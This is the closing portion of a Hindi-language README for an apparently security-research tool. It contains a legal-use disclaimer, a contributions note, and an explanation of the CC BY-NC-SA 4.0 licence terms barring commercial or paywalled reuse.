⚖️ यह शोध शैक्षिक और सुरक्षा शोध उद्देश्यों के लिए कानूनी रूप से स्वामित्व वाले उपकरणों पर किया गया था। दुर्भावनापूर्ण उद्देश्यों के लिए इस जानकारी का कोई भी उपयोग सख्त वर्जित है और लागू कानूनों का उल्लंघन हो सकता है।

याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस ज्ञान का उपयोग बेहतर और अधिक सुरक्षित सिस्टम बनाने के लिए करें!

## योगदान

यदि आपको अतिरिक्त समस्याएँ या सुधार मिलते हैं, तो कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें या एक इश्यू खोलें।

## लाइसेंसिंग, और इन फाइलों तक पहुँच
ये फाइलें Creative Commons [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/) लाइसेंसिंग के साथ जारी की गई हैं। 
<p align="left">
  <img src="https://assets.kitploit.com/production/public/readmes/49064/29490d1f406beb842255421807acdf0e4327f9cdf7547041398560fd7452a5ea.png">
</p>

यह लाइसेंस आपको इन फाइलों का उपयोग करने के लिए विशिष्ट, लेकिन सीमित अधिकार प्रदान करता है। 
<p align="left">
  <img src="https://assets.kitploit.com/production/public/readmes/49064/00bb7938b330aa21407316a9f3d62fdad4e502fddc76237f7ae4e6b518386dcb.png">
</p>

[Attribution NonCommercial ShareAlike 4.0 International license](https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.en)

आप इनके लिए स्वतंत्र हैं:<br>
साझा करें — सामग्री को किसी भी माध्यम या प्रारूप में कॉपी और पुनर्वितरित करें<br>
अनुकूलित करें — सामग्री को रीमिक्स, रूपांतरित और उस पर निर्माण करें<br>

जब तक आप लाइसेंस की शर्तों का पालन करते हैं, लाइसेंसकर्ता इन स्वतंत्रताओं को रद्द नहीं कर सकता।<br>

निम्नलिखित शर्तों के तहत:<br>
Attribution — आपको उचित श्रेय देना होगा , लाइसेंस का लिंक प्रदान करना होगा, और इंगित करना होगा कि परिवर्तन किए गए थे . आप यह किसी भी उचित तरीके से कर सकते हैं, लेकिन किसी भी ऐसे तरीके से नहीं जो यह सुझाव दे कि लाइसेंसकर्ता आपका या आपके उपयोग का समर्थन करता है।<br>

NonCommercial — आप सामग्री का उपयोग व्यावसायिक उद्देश्यों के लिए नहीं कर सकते।<br>

ShareAlike — यदि आप सामग्री को रीमिक्स, रूपांतरित या उस पर निर्माण करते हैं, तो आपको अपने योगदान को मूल के समान लाइसेंस के तहत वितरित करना होगा।<br>

कोई अतिरिक्त प्रतिबंध नहीं — आप ऐसी कानूनी शर्तें या तकनीकी उपाय लागू नहीं कर सकते जो दूसरों को लाइसेंस द्वारा अनुमत किसी भी चीज़ से कानूनी रूप से प्रतिबंधित करते हों।<br>

सूचनाएँ: लाइसेंसिंग पर अधिक जानकारी के लिए कृपया [Creative Commons NonCommercial interpretation](https://wiki.creativecommons.org/wiki/NonCommercial_interpretation) पढ़ें।<br>

इसका सीधा मतलब है कि आप इन फाइलों तक पहुँच के लिए शुल्क नहीं ले सकते, और आप उन्हें अपने व्यावसायिक भेद्यता शोषण प्लेटफ़ॉर्म में नहीं जोड़ सकते, या उन्हें पेवॉल नहीं कर सकते, क्योंकि आपके पास स्पष्ट रूप से ऐसा करने की अनुमति नहीं है, वास्तव में आपको संभावित कानूनी परिणामों के बिना ऐसा करने से विशेष रूप से प्रतिबंधित किया गया है। 

यह शोध शैक्षिक उद्देश्यों के लिए साझा किया गया है। कृपया जिम्मेदारी से उपयोग करें।
टूल डाउनलोड करें